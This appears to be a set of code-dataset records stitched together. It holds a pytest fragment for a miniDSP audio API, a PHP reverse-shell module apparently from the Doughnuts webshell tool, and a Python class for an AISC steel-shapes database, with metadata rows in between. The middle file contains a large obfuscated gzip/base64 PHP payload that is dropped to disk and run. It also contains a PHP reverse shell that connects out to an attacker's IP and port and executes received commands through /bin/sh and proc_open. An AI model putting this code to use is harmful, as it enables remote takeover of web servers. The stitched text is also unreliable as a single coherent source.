input 1 peq 1 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 1 bypass off
input 1 peq 2 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 2 bypass off
input 1 peq 3 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 3 bypass off
input 1 peq 4 set -- 1.0003468763586854 -1.9979191385126602 0.9975784764805841 1.9979204983896346 -0.9979239929622952
input 1 peq 4 bypass off
input 1 peq 5 bypass on
input 1 peq 6 bypass on
input 1 peq 7 bypass on
input 1 peq 8 bypass on
input 1 peq 9 bypass on
gain -- -10.20"""
assert '\n'.join(cmds) == expected_commands
# and: device state is accurate
slots = verify_master_device_state(r.json, gain=-10.2)
for idx, s in enumerate(slots):
if idx == 1:
verify_slot(s, idx + 1, gain=(5.10, 6.10))
elif idx == 2:
verify_slot(s, idx + 1, active=True, gain=(-1.1, -1.1), last='Alien Resurrection')
else:
verify_slot(s, idx + 1)
def test_reload_from_cache(minidsp_client, tmp_path):
from ezbeq.minidsp import MinidspState
expected = MinidspState('master')
expected.update_master_state(True, -5.4)
slot = expected.get_slot('2')
slot.mute(None)
slot.gain1 = 4.8
slot.active = True
slot.last = 'Testing'
with open(os.path.join(tmp_path, 'master.json'), 'w') as f:
json.dump(expected.serialise(), f, sort_keys=True)
r = minidsp_client.get("/api/1/devices")
assert r.status_code == 200
# master state is not restored
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
if idx == 1:
verify_slot(s, idx + 1, active=True, gain=(4.8, 0.0), mute=(True, True), last='Testing')
else:
verify_slot(s, idx + 1)
@pytest.mark.parametrize("outputs",
[[], [1], [2], [3], [4], [1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 3], [1, 2, 4],
[1, 3, 4], [2, 3, 4], [1, 2, 3, 4]], ids=str)
@pytest.mark.parametrize("inputs", [[], [1], [2], [1, 2]], ids=str)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_load_custom_biquads(minidsp_client, minidsp_app, slot, is_valid, inputs, outputs):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: load biquads
biquads = """
biquad1,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad2,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad3,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad4,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad5,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
biquad6,
b0=1.0005426820797225,
b1=-1.9979198828450513,
b2=0.9973892456913641,
a1=1.9979233065003874,
a2=-0.9979285041157505,
biquad7,
b0=1.0005426820797225,
b1=-1.9979198828450513,
b2=0.9973892456913641,
a1=1.9979233065003874,
a2=-0.9979285041157505,
biquad8,
b0=1.0008712609026622,
b1=-1.996065923472451,
b2=0.9952168257035099,
a1=1.996065923472451,
a2=-0.9960880866061722,
biquad9,
b0=1.0,
b1=0.0,
b2=0.0,
a1=-0.0,
a2=-0.0,
biquad10,
b0=1.0,
b1=0.0,
b2=0.0,
a1=-0.0,
a2=-0.0"""
payload = {
'overwrite': False,
'inputs': inputs,
'outputs': outputs,
'slot': str(slot),
'biquads': biquads
}
r = minidsp_client.put(f"/api/1/devices/master/biquads", data=json.dumps(payload), content_type='application/json')
if is_valid:
assert r.status_code == 200
single_channel_cmds = [
'peq 0 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
'peq 0 bypass off',
'peq 1 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
'peq 1 bypass off',
'peq 2 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
'peq 2 bypass off',
'peq 3 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
'peq 3 bypass off',
'peq 4 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
'peq 4 bypass off',
'peq 5 set -- 1.0005426820797225 -1.9979198828450513 0.9973892456913641 1.9979233065003874 -0.9979285041157505',
'peq 5 bypass off',
'peq 6 set -- 1.0005426820797225 -1.9979198828450513 0.9973892456913641 1.9979233065003874 -0.9979285041157505',
'peq 6 bypass off',
'peq 7 set -- 1.0008712609026622 -1.996065923472451 0.9952168257035099 1.996065923472451 -0.9960880866061722',
'peq 7 bypass off',
'peq 8 set -- 1.0 0.0 0.0 -0.0 -0.0',
'peq 8 bypass off',
'peq 9 set -- 1.0 0.0 0.0 -0.0 -0.0',
'peq 9 bypass off'
]
def expand(prefix, channels):
return [f"{prefix} {c - 1} {l}" for c in channels for l in single_channel_cmds]
expected_commands = []
if inputs:
expected_commands += expand('input', inputs)
if outputs:
expected_commands += expand('output', outputs)
total_channel_count = len(inputs) + len(outputs)
# then: expected commands are sent
cmds = verify_cmd_count(config.spy, slot, 20 * total_channel_count)
assert cmds == expected_commands
# and: device state is accurate
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
if idx == slot - 1:
if inputs:
verify_slot(s, idx + 1, active=True, last='CUSTOM')
else:
verify_slot(s, idx + 1, active=True)
else:
verify_slot(s, idx + 1)
else:
assert r.status_code == 400
def test_load_single_biquad(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: load biquads
biquads = """
biquad1,
b0=1.0002465879245352,
b1=-1.9989127232747768,
b2=0.9986691478494831,
a1=1.9989135168404932,
a2=-0.998914942208302,
"""
payload = {
'overwrite': True,
'inputs': [],
'outputs': [1],
'slot': '1',
'biquads': biquads
}
r = minidsp_client.put(f"/api/1/devices/master/biquads", data=json.dumps(payload), content_type='application/json')
assert r.status_code == 200
single_channel_cmds = [
'peq 0 set -- 1.0002465879245352 -1.9989127232747768 0.9986691478494831 1.9989135168404932 -0.998914942208302',
'peq 0 bypass off',
'peq 1 bypass on',
'peq 2 bypass on',
'peq 3 bypass on',
'peq 4 bypass on',
'peq 5 bypass on',
'peq 6 bypass on',
'peq 7 bypass on',
'peq 8 bypass on',
'peq 9 bypass on'
]
expected_commands = [f"output 0 {l}" for l in single_channel_cmds]
# then: expected commands are sent
cmds = verify_cmd_count(config.spy, 1, 11)
assert cmds == expected_commands
# and: device state is accurate
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
if idx == 0:
verify_slot(s, idx + 1, active=True)
else:
verify_slot(s, idx + 1)
@pytest.mark.parametrize('endpoint', ['details', 'filters'])
def test_get_by_digest(minidsp_client, minidsp_app, endpoint):
r = minidsp_client.get(f"/api/1/catalogue/abcdefghijklm/{endpoint}")
assert r.status_code == 200
entry = r.json
assert entry
assert entry['digest'] == 'abcdefghijklm'
assert entry['title'] == 'Alien Resurrection'
@pytest.mark.parametrize('endpoint', ['details', 'filters'])
def test_get_by_digest_404(minidsp_client, minidsp_app, endpoint):
r = minidsp_client.get(f"/api/1/catalogue/abcdefghijkl/{endpoint}")
assert r.status_code == 404
| 37.399229
| 149
| 0.660392
| 5,595
| 38,783
| 4.448257
| 0.044147
| 0.041787
| 0.034997
| 0.028005
| 0.871183
| 0.853263
| 0.842293
| 0.821882
| 0.811998
| 0.783832
| 0
| 0.172399
| 0.213599
| 38,783
| 1,036
| 150
| 37.435328
| 0.643628
| 0.018281
| 0
| 0.670022
| 0
| 0.045861
| 0.318737
| 0.040292
| 0
| 0
| 0
| 0
| 0.176734
| 1
| 0.053691
| false
| 0.134228
| 0.006711
| 0.001119
| 0.064877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3bf39288de2f8e4562707e4b1af892a8cdcae5eb
| 73
|
py
|
Python
|
api/utils.py
|
mateusvictor/School-API
|
eff0ff3ee8d07fc89e8688615ec685e3dbfc0478
|
[
"MIT"
] | null | null | null |
api/utils.py
|
mateusvictor/School-API
|
eff0ff3ee8d07fc89e8688615ec685e3dbfc0478
|
[
"MIT"
] | null | null | null |
api/utils.py
|
mateusvictor/School-API
|
eff0ff3ee8d07fc89e8688615ec685e3dbfc0478
|
[
"MIT"
] | null | null | null |
import datetime
def current_year():
return datetime.date.today().year
| 12.166667
| 34
| 0.767123
| 10
| 73
| 5.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123288
| 73
| 5
| 35
| 14.6
| 0.859375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
020181c4bcbb8c70ac7a7b5056b0d9747fc3da2f
| 9,376
|
py
|
Python
|
doughnuts/libs/functions/webshell_plugins/reverse.py
|
MorouU/Doughnuts
|
ca4777551b27e6dbe9015827ecf091b1dafcd064
|
[
"MIT"
] | 5
|
2020-10-09T05:01:34.000Z
|
2020-11-15T08:38:06.000Z
|
doughnuts/libs/functions/webshell_plugins/reverse.py
|
SkyBlueEternal/Doughnuts
|
8d82cffd3e4867f5e87ce35bdcf53678049c579c
|
[
"MIT"
] | 1
|
2020-11-10T03:44:57.000Z
|
2020-11-10T03:44:57.000Z
|
doughnuts/libs/functions/webshell_plugins/reverse.py
|
SkyBlueEternal/Doughnuts
|
8d82cffd3e4867f5e87ce35bdcf53678049c579c
|
[
"MIT"
] | null | null | null |
def get_php_reverse_php():
return {
"windows":"""
header('Content-type: text/plain');
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
file_put_contents("%s", $evalCode);
%s""",
"else": """
ignore_user_abort(true);
ini_set("max_execution_time",0);
$ipaddr = "%s";
$port = "%s";
if(!function_exists('get_ini_value')) {
%s
}
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()."\\nTemporary shall\\n";
$type = True;
if(!in_array('proc_open', @explode(',', get_ini_value('disable_functions')))){
$sock = fsockopen($ipaddr, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
die();
}
else{
$env = array("path" => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin");
}
if(function_exists("fsockopen")) {
$sock = fsockopen($ipaddr,$port);
} else {
$sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_connect($sock,$ipaddr,$port);
socket_write($sock,$msg);
$type = False;
}
fwrite($sock,$msg);
fwrite($sock,"[".getcwd()."]$ ");
while (True) {
if ($type == True){
$cmd = fread($sock,1024);
} else {
$cmd = socket_read($sock,1024);
}
if (substr($cmd,0,3) == "cd " and strlen($cmd) > 3) {
$cwd = trim(substr($cmd,3));
chdir($cwd);
$cwd = getcwd();
}
else if (trim(strtolower($cmd)) == "exit") {
break;
} else {
$process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
if ($type == True){
fwrite($sock,$msg);
} else {
socket_write($sock,$msg,strlen($msg));
}
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
if ($type == True){
fwrite($sock,$msg);
} else {
socket_write($sock,$msg,strlen($msg));
}
fclose($pipes[2]);
proc_close($process);
}
}
fwrite($sock,"[".getcwd()."]$ ");
}
if ($type == True){
fclose($sock);
} else {socket_close($sock);
}"""}
| 104.177778
| 6,018
| 0.750213
| 463
| 9,376
| 15.105832
| 0.617711
| 0.006005
| 0.005719
| 0.007721
| 0.025736
| 0.018587
| 0.018587
| 0.018587
| 0.018587
| 0.018587
| 0
| 0.13048
| 0.172782
| 9,376
| 89
| 6,019
| 105.348315
| 0.771274
| 0
| 0
| 0.258824
| 0
| 0.047059
| 0.991573
| 0.735147
| 0
| 1
| 0
| 0
| 0
| 1
| 0.011765
| true
| 0
| 0
| 0.011765
| 0.023529
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
022c20765654256eae561754e8e9df3ea95e189d
| 33,841
|
py
|
Python
|
steel/aisc_database_class.py
|
buddyd16/theToolbox
|
b04ca462595af1e90b7c2d1d35527aaf19664b0d
|
[
"BSD-3-Clause"
] | 1
|
2022-02-21T16:06:22.000Z
|
2022-02-21T16:06:22.000Z
|
steel/aisc_database_class.py
|
buddyd16/theToolbox
|
b04ca462595af1e90b7c2d1d35527aaf19664b0d
|
[
"BSD-3-Clause"
] | 2
|
2022-02-10T03:38:50.000Z
|
2022-03-02T14:52:43.000Z
|
steel/aisc_database_class.py
|
buddyd16/theToolbox
|
b04ca462595af1e90b7c2d1d35527aaf19664b0d
|
[
"BSD-3-Clause"
] | null | null | null |
'''
BSD 3-Clause License
Copyright (c) 2019-2022, Donald N. Bockoven III
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
class aisc_15th_database:
def __init__(self):
## BUILD SHAPE DICTIONARY AND ATTRIBUTE LISTS
## NOTE THE STANDARD DATABADE PROVIDED BY AISC NEEDS TO BE CLEANED UP
## ALL - FIELDS NEED TO BE REPLACED BY 0's
file = open('steel/static/aisc_shapes_database_v15.0.csv','r')
data_raw = file.readlines()
file.close()
file = open('steel/static/aisc_v15_units.csv','r')
units_raw = file.readlines()
file.close()
file = open('steel/static/aisc_v15_defs.csv','r')
defs_raw = file.readlines()
file.close()
self.units = units_raw[0].split(',')
self.units[-1] = self.units[-1].rstrip('\n')
self.definitions = []
self.defs_only = ['']
for prop_def in defs_raw:
prop_def = prop_def.split(',')
prop_def[-1] = prop_def[-1].rstrip('\n')
self.definitions.append(prop_def)
self.defs_only.append(prop_def[1])
self.labels = data_raw[0].split(',')
self.labels[-1] = self.labels[-1].rstrip('\n')
self.shapes = []
self.shape_types = []
for shape in data_raw[1:]:
shape = shape.split(',')
shape[-1] = shape[-1].rstrip('\n')
if shape[0] == 'HSS':
if float(shape[10]) > 0:
shape[0] = 'HSS-RND'
elif shape[8] == shape[13]:
shape[0] = 'HSS-SQR'
else:
shape[0] = 'HSS-RECT'
else:
pass
self.shapes.append(shape)
self.shape_types.append(shape[0])
self.shape_types = list(set(self.shape_types))
def WF(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'W':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def PIPE(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
